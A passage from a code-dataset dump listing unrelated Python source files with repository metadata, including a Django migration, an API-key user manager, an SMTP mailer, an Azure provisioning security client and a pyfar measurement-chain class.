] | 3 | 2018-10-06T11:40:53.000Z | 2018-10-07T18:49:06.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-03-30 12:46
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0005_auto_20180330_1813'),
]
operations = [
migrations.AlterField(
model_name='incubator',
name='followers',
field=models.ManyToManyField(blank=True, related_name='incubator_follows', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='incubator',
name='incubated_startup',
field=models.ManyToManyField(blank=True, related_name='incubators', through='app.IncubatorStartup', to='app.Startup'),
),
migrations.AlterField(
model_name='incubator',
name='members',
field=models.ManyToManyField(blank=True, related_name='incubator_members', through='app.IncubatorMember', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='incubator',
name='ratings',
field=models.ManyToManyField(blank=True, related_name='rated_incubators', through='app.IncubatorRating', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='startup',
name='members',
field=models.ManyToManyField(blank=True, related_name='startup_members', through='app.StartupMember', to=settings.AUTH_USER_MODEL),
),
]
| 36.952381 | 147 | 0.646907 | 156 | 1,552 | 6.237179 | 0.371795 | 0.080164 | 0.128469 | 0.149024 | 0.570401 | 0.546763 | 0.464543 | 0.36999 | 0.304214 | 0.133607 | 0 | 0.026981 | 0.235825 | 1,552 | 41 | 148 | 37.853659 | 0.793423 | 0.042526 | 0 | 0.470588 | 1 | 0 | 0.186784 | 0.015509 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.088235 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
697365290d19012dbb2289c34b92ed5cceafd229 | 2,854 | py | Python | users.py | mavi0/onos-reroute-api | e3a155ce860a944563297c076e6ef4d8ac5a563e | [
"MIT"
] | null | null | null | users.py | mavi0/onos-reroute-api | e3a155ce860a944563297c076e6ef4d8ac5a563e | [
"MIT"
] | null | null | null | users.py | mavi0/onos-reroute-api | e3a155ce860a944563297c076e6ef4d8ac5a563e | [
"MIT"
] | null | null | null | import json, base64
import logging, coloredlogs
import hashlib, copy
from flask_table import Table, Col
logger = logging.getLogger(__name__)
coloredlogs.install(level='INFO')
class Users:
def __init__(self):
self.__users = self.__load_users("json/users.json")
self.__generate_hash_keys()
def __load_json(self, filename):
with open(filename) as f:
return json.load(f)
def __load_users(self, config):
try:
config = self.__load_json(config)
except:
logger.critical("Could not find configuration file: " + config)
return config
def __generate_hash_keys(self):
for user in self.__users.get("users"):
hashed = hashlib.sha256(user.get("api_key").encode())
user["hashed_api_key"] = hashed.hexdigest()
def get_key(self, username):
for user in self.__users.get("users"):
if user.get("username") == username:
return user.get("api_key")
return ""
def get_user(self, key):
for user in self.__users.get("users"):
if user.get("api_key") == key:
return user.get("username")
return ""
def get_hashed_key(self, username):
for user in self.__users.get("users"):
if user.get("username") == username:
return user.get("hashed_api_key")
return ""
def authenticate(self, key):
for user in self.__users.get("users"):
if user.get("api_key") == key:
return True
return False
def get_level(self, key):
# Try to match api_key
for user in self.__users.get("users"):
if user.get("api_key") == key:
return user.get("level")
# Try to match username (fallback - is safe as already authed) --- no it's not
# for user in self.__users.get("users"):
# if user.get("username") == key:
# return user.get("level")
return 0
def get_users(self):
users = copy.deepcopy(self.__users)
for user in users.get("users"):
del user["api_key"]
return users
def get_user_table(self):
items = []
for user in self.get_users().get("users"):
items.append(Item(user.get("username"), user.get("level"), user.get("hashed_api_key")))
table = ItemTable(items)
return table.__html__()
# Declare your table
class ItemTable(Table):
classes = ['table table-dark']
name = Col('Username')
level = Col('Level')
hashed_pass = Col('Hashed API Key')
# Get some objects
class Item(object):
def __init__(self, name, level, hashed_pass):
self.name = name
self.level = level
self.hashed_pass = hashed_pass
| 29.122449 | 99 | 0.575333 | 354 | 2,854 | 4.409605 | 0.231638 | 0.067265 | 0.05189 | 0.066624 | 0.297886 | 0.261371 | 0.261371 | 0.244715 | 0.244715 | 0.244715 | 0 | 0.003024 | 0.304835 | 2,854 | 97 | 100 | 29.42268 | 0.78377 | 0.084443 | 0 | 0.202899 | 0 | 0 | 0.100998 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0.043478 | 0.057971 | 0 | 0.536232 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
697cb4df0fee5fb2e4b8167c3cfa2dce9ba8fde7 | 3,564 | py | Python | tests/test_puls_util.py | xiaohan2012/capitalization-restoration-train | 24f9236a553ac91f4e291625e5616d8558f80d3e | [
"MIT"
] | 1 | 2020-03-07T01:25:21.000Z | 2020-03-07T01:25:21.000Z | tests/test_puls_util.py | xiaohan2012/capitalization-restoration-train | 24f9236a553ac91f4e291625e5616d8558f80d3e | [
"MIT"
] | null | null | null | tests/test_puls_util.py | xiaohan2012/capitalization-restoration-train | 24f9236a553ac91f4e291625e5616d8558f80d3e | [
"MIT"
] | null | null | null | import json
import os
import codecs
from capitalization_train.puls_util import (separate_title_from_body,
extract_and_capitalize_headlines_from_corpus,
get_input_example,
get_doc_ids_from_file,
convert_sentence_auxil_to_request)
from nose.tools import assert_equal
CURDIR = os.path.dirname(os.path.realpath(__file__))
with codecs.open(CURDIR + '/data/001BBB8BFFE6841FA498FCE88C43B63A.title.json') as f:
title_sent = json.loads(f.read())
with codecs.open(CURDIR + '/data/001BBB8BFFE6841FA498FCE88C43B63A.title-cap.json') as f:
cap_title_sent = json.loads(f.read())
with codecs.open(CURDIR + '/data/001BBB8BFFE6841FA498FCE88C43B63A.body.json') as f:
body_sents = json.loads(f.read())
def test_separate_title_from_body():
assert_equal.__self__.maxDiff = None
rawpath = CURDIR + '/data/docs_okformed/001BBB8BFFE6841FA498FCE88C43B63A'
title_sents, body_sents = separate_title_from_body(rawpath + ".auxil",
rawpath + ".paf")
assert_equal(len(title_sents), 1)
assert_equal(len(body_sents), 20)
assert_equal(title_sents[0], title_sent)
def test_extract_and_capitalize_headlines_from_corpus():
doc_ids = ['EEBADC60811702C931B0F6CB61CE9054',
'4271571E96D5C726ECFDDDAACA74A264']
corpus_dir = '/cs/fs/home/hxiao/code/capitalization_train/test_data/puls_format_raw/'
result = list(extract_and_capitalize_headlines_from_corpus(
corpus_dir, doc_ids)
)
print(result[0])
assert_equal(len(result), 2)
assert_equal(result[0][0], None)
assert_equal(len(result[0][1][1]), 1)
assert_equal(result[0][1][0], 'EEBADC60811702C931B0F6CB61CE9054')
assert_equal(result[0][1][1],
[[u'Microsoft', u'Gives', u'New', u'Brand', u'Identity',
u'to', u'Nokia', u'Retail', u'Stores']])
result1 = filter(lambda (_, (docid, __)):
docid == '4271571E96D5C726ECFDDDAACA74A264',
result)
assert_equal(len(result1[0][1][1]), 2)
def test_input_example():
actual = get_input_example(
CURDIR + '/data/docs_okformed/',
CURDIR + '/data/docs_malformed/',
'001BBB8BFFE6841FA498FCE88C43B63A'
)
print(cap_title_sent)
expected = {"capitalizedSentences":
[convert_sentence_auxil_to_request(
cap_title_sent)],
"otherSentences": map(
convert_sentence_auxil_to_request,
body_sents)
}
print(expected)
assert_equal(actual, expected)
def test_convert_sentence_auxil_to_request():
sent_auxil = {"sentno":0,"start":51,"end":128,"features":[{"lemma":"nanobiotix","pos":"name_oov","token":"Nanobiotix"},{"lemma":"get","pos":"tv","token":"Gets"},{"lemma":"early","pos":"d","token":"Early"},{"lemma":"positive","pos":"adj","token":"Positive"},{"lemma":"safety","pos":"n","token":"Safety"},{"lemma":"result","pos":"n","token":"Results"}]}
actual = convert_sentence_auxil_to_request(sent_auxil)
expected = {'no': 0,
'tokens': ['Nanobiotix', 'Gets', 'Early', 'Positive', 'Safety', 'Results'],
'pos': ['name_oov', 'tv', 'd', 'adj', 'n', 'n']
}
assert_equal(actual, expected)
def test_get_doc_ids_from_file():
ids = get_doc_ids_from_file(CURDIR + '/data/docids.txt')
assert_equal(len(ids), 4)
| 40.044944 | 355 | 0.62486 | 404 | 3,564 | 5.207921 | 0.294554 | 0.073194 | 0.039924 | 0.052281 | 0.312262 | 0.228612 | 0.142586 | 0.075095 | 0.075095 | 0.075095 | 0 | 0.069835 | 0.232604 | 3,564 | 88 | 356 | 40.5 | 0.699452 | 0 | 0 | 0.028571 | 0 | 0 | 0.236532 | 0.127104 | 0 | 0 | 0 | 0 | 0.2 | 0 | null | null | 0 | 0.071429 | null | null | 0.042857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6982d7079fdcf3a58b79ac8ac6683d28485634e2 | 1,147 | py | Python | server/src/utils/mailer.py | ocskier/TutorDashboard | 4dedfee7676418660cca0043ee71db720f915cca | [
"Apache-2.0"
] | 1 | 2020-10-28T21:36:13.000Z | 2020-10-28T21:36:13.000Z | server/src/utils/mailer.py | ocskier/TutorDashboard | 4dedfee7676418660cca0043ee71db720f915cca | [
"Apache-2.0"
] | 36 | 2020-10-14T15:12:21.000Z | 2021-07-15T21:33:39.000Z | server/src/utils/mailer.py | ocskier/TutorDashboard | 4dedfee7676418660cca0043ee71db720f915cca | [
"Apache-2.0"
] | 1 | 2020-10-22T07:50:59.000Z | 2020-10-22T07:50:59.000Z | import smtplib, ssl, os
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from .html_template import emailHtml
from .text_template import emailText
port = 465
context = ssl.create_default_context()
def sendEmail(emailData):
adminUser = os.getenv("ADMIN_USERNAME")
password = os.getenv("ADMIN_PASSWORD")
sender = emailData["tutor"]
receivers = emailData["recipient"]
message = MIMEMultipart("alternative")
message["Subject"] = "Tutor Confirmation"
message["From"] = adminUser
message["To"] = receivers
message["Cc"] = sender, "centraltutor@bcs.com"
text = emailText(emailData)
html = emailHtml(emailData)
part1 = MIMEText(text, "plain")
part2 = MIMEText(html, "html")
message.attach(part1)
message.attach(part2)
try:
with smtplib.SMTP_SSL('smtp.gmail.com',port,context=context) as server:
server.login(adminUser,password)
server.sendmail(adminUser, receivers, message.as_string())
print("Successfully sent email")
except smtplib.SMTPException:
print("Error: unable to send email") | 29.410256 | 79 | 0.691369 | 128 | 1,147 | 6.132813 | 0.484375 | 0.02293 | 0.033121 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007592 | 0.196164 | 1,147 | 39 | 80 | 29.410256 | 0.843818 | 0 | 0 | 0 | 0 | 0 | 0.155923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0.066667 | 0.166667 | 0 | 0.2 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6988900c33f8027bb264778efef7f83d1aa37d8a | 200 | py | Python | clancy_database/__init__.py | arthurian/visualizing_russian_tools | 65fd37839dc0650bb25d1f98904da5b79ae1a754 | [
"BSD-3-Clause"
] | 2 | 2020-07-10T14:17:03.000Z | 2020-11-17T09:18:26.000Z | clancy_database/__init__.py | eelegiap/visualizing_russian_tools | 9c36baebc384133c7c27d7a7c4e0cedc8cb84e74 | [
"BSD-3-Clause"
] | 13 | 2019-03-17T13:27:31.000Z | 2022-01-18T17:03:14.000Z | clancy_database/__init__.py | eelegiap/visualizing_russian_tools | 9c36baebc384133c7c27d7a7c4e0cedc8cb84e74 | [
"BSD-3-Clause"
] | 2 | 2019-10-19T16:37:44.000Z | 2020-06-22T13:30:20.000Z | # List of tables that should be routed to this app.
# Note that this is not intended to be a complete list of the available tables.
TABLE_NAMES = (
'lemma',
'inflection',
'aspect_pair',
)
| 25 | 79 | 0.69 | 31 | 200 | 4.387097 | 0.774194 | 0.088235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.23 | 200 | 7 | 80 | 28.571429 | 0.883117 | 0.635 | 0 | 0 | 0 | 0 | 0.371429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
699310c68f6ee0233724f50d1b8ed775e875d6af | 714 | py | Python | reflex/src/reflex/reflex_polling.py | EnricoSartori/reflex_ros_pkg | 960373a48a0d9095025763400a00c1b30fe4ede5 | [
"Apache-2.0"
] | null | null | null | reflex/src/reflex/reflex_polling.py | EnricoSartori/reflex_ros_pkg | 960373a48a0d9095025763400a00c1b30fe4ede5 | [
"Apache-2.0"
] | null | null | null | reflex/src/reflex/reflex_polling.py | EnricoSartori/reflex_ros_pkg | 960373a48a0d9095025763400a00c1b30fe4ede5 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import rospy
from reflex_msgs.msg import HandCommand
from time import sleep
from reflex_base_services import *
class ReFlex_Polling(ReFlex):
def __init__(self):
super(ReFlex_Polling, self).__init__()
def callback(data):
# data is a HandCommand variable
self.move_finger(0, data.angles[0])
self.move_finger(1, data.angles[1])
#self.move_finger(2, data.angles[2])
rospy.Subscriber("reflex_commander", HandCommand, callback)
# spin: this function generate the polling
rospy.spin()
if __name__ == '__main__':
rospy.init_node('ReflexPollingNode')
reflex_hand = ReFlex_Polling()
| 25.5 | 67 | 0.658263 | 87 | 714 | 5.08046 | 0.517241 | 0.088235 | 0.095023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011111 | 0.243697 | 714 | 27 | 68 | 26.444444 | 0.807407 | 0.177871 | 0 | 0 | 0 | 0 | 0.070326 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.266667 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6998bcb96c84eee08055afeb394e0c10dfe55e4a | 248 | py | Python | test-crates/hello-world/check_installed/check_installed.py | pattonw/pyo3-pack | 675d92819faf56e972d1553ea8199425cb7f7e94 | [
"Apache-2.0",
"MIT"
] | null | null | null | test-crates/hello-world/check_installed/check_installed.py | pattonw/pyo3-pack | 675d92819faf56e972d1553ea8199425cb7f7e94 | [
"Apache-2.0",
"MIT"
] | null | null | null | test-crates/hello-world/check_installed/check_installed.py | pattonw/pyo3-pack | 675d92819faf56e972d1553ea8199425cb7f7e94 | [
"Apache-2.0",
"MIT"
] | null | null | null | from subprocess import check_output
def main():
output = check_output(["hello-world"]).decode("utf-8").strip()
if not output == "Hello, world!":
raise Exception(output)
print("SUCCESS")
if __name__ == '__main__':
main()
| 19.076923 | 66 | 0.633065 | 30 | 248 | 4.9 | 0.666667 | 0.14966 | 0.217687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005076 | 0.205645 | 248 | 12 | 67 | 20.666667 | 0.741117 | 0 | 0 | 0 | 0 | 0 | 0.177419 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.25 | 0.125 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
699dbfba09e4b2780e57672a2d8ecc9e67db0fe3 | 702 | py | Python | resilient-circuits/resilient_circuits/__init__.py | COLDTURNIP/resilient-python-api | 14423f1dec32af67f7203c8d4d36d0a9e2651802 | [
"MIT"
] | 28 | 2017-12-22T00:26:59.000Z | 2022-01-22T14:51:33.000Z | resilient-circuits/resilient_circuits/__init__.py | COLDTURNIP/resilient-python-api | 14423f1dec32af67f7203c8d4d36d0a9e2651802 | [
"MIT"
] | 18 | 2018-03-06T19:04:20.000Z | 2022-03-21T15:06:30.000Z | resilient-circuits/resilient_circuits/__init__.py | COLDTURNIP/resilient-python-api | 14423f1dec32af67f7203c8d4d36d0a9e2651802 | [
"MIT"
] | 28 | 2018-05-01T17:53:22.000Z | 2022-03-28T09:56:59.000Z | # (c) Copyright IBM Corp. 2010, 2018. All Rights Reserved.
import pkg_resources
try:
__version__ = pkg_resources.get_distribution(__name__).version
except pkg_resources.DistributionNotFound:
__version__ = None
from .actions_component import ResilientComponent
from .action_message import ActionMessageBase, ActionMessage, \
FunctionMessage, FunctionResult, FunctionError, \
StatusMessage, BaseFunctionError
from .decorators import function, inbound_app, app_function, handler, required_field, required_action_field, defer, debounce
from .actions_test_component import SubmitTestAction, SubmitTestFunction, SubmitTestInboundApp
from .app_function_component import AppFunctionComponent
| 43.875 | 124 | 0.837607 | 72 | 702 | 7.791667 | 0.652778 | 0.064171 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01278 | 0.108262 | 702 | 15 | 125 | 46.8 | 0.883387 | 0.079772 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
69a258f2db5f02076d0ecb02bb0169664304388a | 1,732 | py | Python | Day 23/ViralAdvertising.py | sandeep-krishna/100DaysOfCode | af4594fb6933e4281d298fa921311ccc07295a7c | [
"MIT"
] | null | null | null | Day 23/ViralAdvertising.py | sandeep-krishna/100DaysOfCode | af4594fb6933e4281d298fa921311ccc07295a7c | [
"MIT"
] | null | null | null | Day 23/ViralAdvertising.py | sandeep-krishna/100DaysOfCode | af4594fb6933e4281d298fa921311ccc07295a7c | [
"MIT"
] | null | null | null | '''
HackerLand Enterprise is adopting a new viral advertising strategy. When they launch a new product, they advertise it to exactly people on social media.
On the first day, half of those people (i.e., ) like the advertisement and each shares it with of their friends. At the beginning of the second day, people receive the advertisement.
Each day, of the recipients like the advertisement and will share it with friends on the following day. Assuming nobody receives the advertisement twice, determine how many people have liked the ad by the end of a given day, beginning with launch day as day .
For example, assume you want to know how many have liked the ad by the end of the day.
Day Shared Liked Cumulative
1 5 2 2
2 6 3 5
3 9 4 9
4 12 6 15
5 18 9 24
The cumulative number of likes is .
Function Description
Complete the viralAdvertising function in the editor below. It should return the cumulative number of people who have liked the ad at a given time.
viralAdvertising has the following parameter(s):
n: the integer number of days
Input Format
A single integer, , denoting a number of days
Output Format
Print the number of people who liked the advertisement during the first days.
Sample Input
3
Sample Output
9
'''
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the viralAdvertising function below.
def viralAdvertising(n):
ppl = [2]
for i in range(n-1):
ppl.append(ppl[-1]*3//2)
return sum(ppl)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
result = viralAdvertising(n)
fptr.write(str(result) + '\n')
fptr.close()
| 28.866667 | 261 | 0.714781 | 280 | 1,732 | 4.389286 | 0.467857 | 0.065094 | 0.029292 | 0.034174 | 0.039056 | 0.039056 | 0.039056 | 0.039056 | 0 | 0 | 0 | 0.023952 | 0.228637 | 1,732 | 59 | 262 | 29.355932 | 0.895958 | 0.789261 | 0 | 0 | 0 | 0 | 0.061798 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.3125 | 0 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
69aa6a9832bfa5efcd1c75e435948454112b6d04 | 4,480 | py | Python | azure-iot-device/azure/iot/device/provisioning/security/sk_security_client.py | olivakar/azure-iot-sdk-python | d8f2403030cf94510d381d8d5ac37af6e8d306f8 | [
"MIT"
] | 35 | 2018-12-01T05:42:30.000Z | 2021-03-10T12:23:41.000Z | azure-iot-device/azure/iot/device/provisioning/security/sk_security_client.py | olivakar/azure-iot-sdk-python | d8f2403030cf94510d381d8d5ac37af6e8d306f8 | [
"MIT"
] | 81 | 2018-11-20T20:01:43.000Z | 2019-09-06T23:57:17.000Z | azure-iot-device/azure/iot/device/provisioning/security/sk_security_client.py | olivakar/azure-iot-sdk-python | d8f2403030cf94510d381d8d5ac37af6e8d306f8 | [
"MIT"
] | 18 | 2019-03-19T18:53:43.000Z | 2021-01-10T09:47:24.000Z | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""This module contains a client that is responsible for providing shared access tokens that will eventually establish
the authenticity of devices to Device Provisioning Service.
"""
from azure.iot.device.common.sastoken import SasToken
class SymmetricKeySecurityClient(object):
"""
A client that is responsible for providing shared access tokens that will eventually establish
the authenticity of devices to Device Provisioning Service.
:ivar provisioning_host: Host running the Device Provisioning Service
:ivar registration_id: : The registration ID is used to uniquely identify a device in the Device Provisioning Service.
:ivar id_scope: : The ID scope is used to uniquely identify the specific provisioning service the device will
register through.
"""
def __init__(self, provisioning_host, registration_id, id_scope, symmetric_key):
"""
Initialize the symmetric key security client.
:param provisioning_host: Host running the Device Provisioning Service. Can be found in the Azure portal in the
Overview tab as the string Global device endpoint
:param registration_id: The registration ID is used to uniquely identify a device in the Device Provisioning Service.
The registration ID is alphanumeric, lowercase string and may contain hyphens.
:param id_scope: The ID scope is used to uniquely identify the specific provisioning service the device will
register through. The ID scope is assigned to a Device Provisioning Service when it is created by the user and
is generated by the service and is immutable, guaranteeing uniqueness.
:param symmetric_key: The key which will be used to create the shared access signature token to authenticate
the device with the Device Provisioning Service. By default, the Device Provisioning Service creates
new symmetric keys with a default length of 32 bytes when new enrollments are saved with the Auto-generate keys
option enabled. Users can provide their own symmetric keys for enrollments by disabling this option within
16 bytes and 64 bytes and in valid Base64 format.
"""
self._provisioning_host = provisioning_host
self._registration_id = registration_id
self._id_scope = id_scope
self._symmetric_key = symmetric_key
self._sas_token = None
@property
def provisioning_host(self):
"""
:return: The registration ID is used to uniquely identify a device in the Device Provisioning Service.
The registration ID is alphanumeric, lowercase string and may contain hyphens.
"""
return self._provisioning_host
@property
def registration_id(self):
"""
:return: The registration ID is used to uniquely identify a device in the Device Provisioning Service.
The registration ID is alphanumeric, lowercase string and may contain hyphens.
"""
return self._registration_id
@property
def id_scope(self):
"""
:return: Host running the Device Provisioning Service.
"""
return self._id_scope
def _create_shared_access_signature(self):
"""
Construct SAS tokens that have a hashed signature formed using the symmetric key of this security client.
This signature is recreated by the Device Provisioning Service to verify whether a security token presented
during attestation is authentic or not.
:return: A string representation of the shared access signature which is of the form
SharedAccessSignature sig={signature}&se={expiry}&skn={policyName}&sr={URL-encoded-resourceURI}
"""
uri = self._id_scope + "/registrations/" + self._registration_id
key = self._symmetric_key
time_to_live = 3600
keyname = "registration"
return SasToken(uri, key, keyname, time_to_live)
def get_current_sas_token(self):
if self._sas_token is None:
self._sas_token = self._create_shared_access_signature()
else:
self._sas_token.refresh()
return str(self._sas_token)
| 50.909091 | 125 | 0.697321 | 563 | 4,480 | 5.42984 | 0.300178 | 0.093229 | 0.106313 | 0.091593 | 0.39156 | 0.388943 | 0.376186 | 0.376186 | 0.340203 | 0.340203 | 0 | 0.003456 | 0.225 | 4,480 | 87 | 126 | 51.494253 | 0.877016 | 0.665402 | 0 | 0.103448 | 0 | 0 | 0.022632 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.206897 | false | 0 | 0.034483 | 0 | 0.448276 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69ab300f18ef0da610d86dd3cc10be0de5d8ac1c | 10,093 | py | Python | mestopy/mestopy.py | pyfar-seminar/mestopy | 5eed12b12bb58965fa70be591d774f149fcbf6e8 | [
"MIT"
] | null | null | null | mestopy/mestopy.py | pyfar-seminar/mestopy | 5eed12b12bb58965fa70be591d774f149fcbf6e8 | [
"MIT"
] | null | null | null | mestopy/mestopy.py | pyfar-seminar/mestopy | 5eed12b12bb58965fa70be591d774f149fcbf6e8 | [
"MIT"
] | null | null | null | from scipy.signal import oaconvolve
from pyfar import Signal
# Class to generate ref-Objects, that can bei part of the MeasurementChain
class Device(object):
"""Class for device in MeasurementChain.
This class holds methods and properties of a device in the
'MeasurementChain' class. A device can be e.g., a sound card or a
pre-amplifier, described by a frequency response and/or sensitivity.
"""
def __init__(self, name, data=None, sens=1, unit=None):
"""Init Device with data.
Attributes
----------
name : str
Name of the device.
data : Signal, None, optional
Signal data that reprensets the inversed frequency response of
the device. The default is None, in this case a perfect flat
frequency response is assumed and only sensitivity as a factor
is applied.
Caution: Avoid large gains in the frequency responses because
they will boost measurement noise and might cause numerical
instabilities. One possibility to avoid this is to use
regularized inversion.
sens : float, optional
Sensitivity of the device as a factor. If neither device_data nor
sens is given, add_device generates a device that has no effect to
the measurement chain as it has no frequency response and a
sesitivity (factor) default of 1.
unit : str, optional
The phyiscal unit of the device, e.g., mV/Pa.
"""
self.name = name
self.data = data
self.sens = sens
self.unit = unit
@property
def name(self):
"""The name of the device"""
return self._name
@name.setter
def name(self, name):
if not isinstance(name, str):
raise ValueError('Device name must be string.')
else:
self._name = name
@property
def data(self):
"""The freqeuncy dependent data, representing the device."""
return self._data
@data.setter
def data(self, data):
if not isinstance(data, (Signal, type(None))):
raise TypeError('Input data must be type Signal or None.')
else:
self._data = data
@property
def sens(self):
"""The sensitivity of the device."""
return self._sens
@sens.setter
def sens(self, sens):
if not isinstance(sens, (int, float)):
raise ValueError('Sensitivity must be a number (int or float).')
else:
self._sens = sens
@property
def unit(self):
"""The unit of the sensitivity."""
return self._unit
@unit.setter
def unit(self, unit):
if not (isinstance(unit, str) or unit is None):
raise ValueError('Unit of sensitivity must be string or None.')
else:
self._unit = unit
@property
def freq(self):
"""Return the inverted frequency multiplied by the sensitivity as a signal,
or the sensitivity as scalar, when the device has no frequency
response.
"""
if self.data is not None:
return self.data * self.sens
else:
return self.sens
def __repr__(self):
"""String representation of Device class."""
if self.data is None:
repr_string = (
f"{self.name} defined by "
f"sensitivity={self.sens} unit={self.unit}\n")
else:
repr_string = (
f"{self.name} defined by {self.data.n_bins} freq-bins, "
f"sensitivity={self.sens} unit={self.unit}\n")
return repr_string
# Class for MeasurementChain as frame for Devices
class MeasurementChain(object):
"""Class for complete measurement chain.
This class holds methods and properties of all devices in the
measurement chain. It can include a single or multiple objects of
the Device class.
"""
def __init__(self,
sampling_rate,
sound_device=None,
devices=None,
comment=None):
"""Init measurement chain with sampling rate.
Attributes
----------
sampling_rate : double
Sampling rate in Hertz.
sound_device : int
Number to identify the sound device used. The default is None.
devices : list
A list of Device objects. The default is an empty list.
comment : str
A comment related to the measurement chain. The default is None.
"""
self.sampling_rate = sampling_rate
self.sound_device = sound_device
self.comment = comment
if isinstance(devices, type(None)):
self.devices = []
else:
for dev in devices:
if not isinstance(dev, Device):
raise TypeError('Input data must be type Device.')
if dev.data is None:
continue
if not dev.data.sampling_rate == self.sampling_rate:
raise ValueError("Sampling rate of device does not agree "
"with the measurement chain.")
self.devices = devices
self._freq()
def _find_device_index(self, name):
"""Private method to find the index of a given device name."""
for i, dev in enumerate(self.devices):
if dev.name == name:
return i
raise ValueError(f"device {name} not found")
def _freq(self):
"""Private method to calculate the frequency response of the complete
measurement chain and save it to the private attribute _resp."""
if self.devices == []:
resp = 1.0
else:
resp = [[1.0]]
for dev in self.devices:
if isinstance(dev.freq, Signal):
resp = oaconvolve(resp, dev.freq.time)
else:
resp = oaconvolve(resp, [[dev.freq]])
resp = Signal(resp, self.sampling_rate, domain='time')
resp.domain = 'freq'
self._resp = resp
def add_device(self,
name,
data=None,
sens=1,
unit=None
):
"""Adds a new device to the measurement chain.
Refer to the documentation of Device class.
Attributes
----------
name : str
data : pyfar.Signal, optional
sens : float, optional
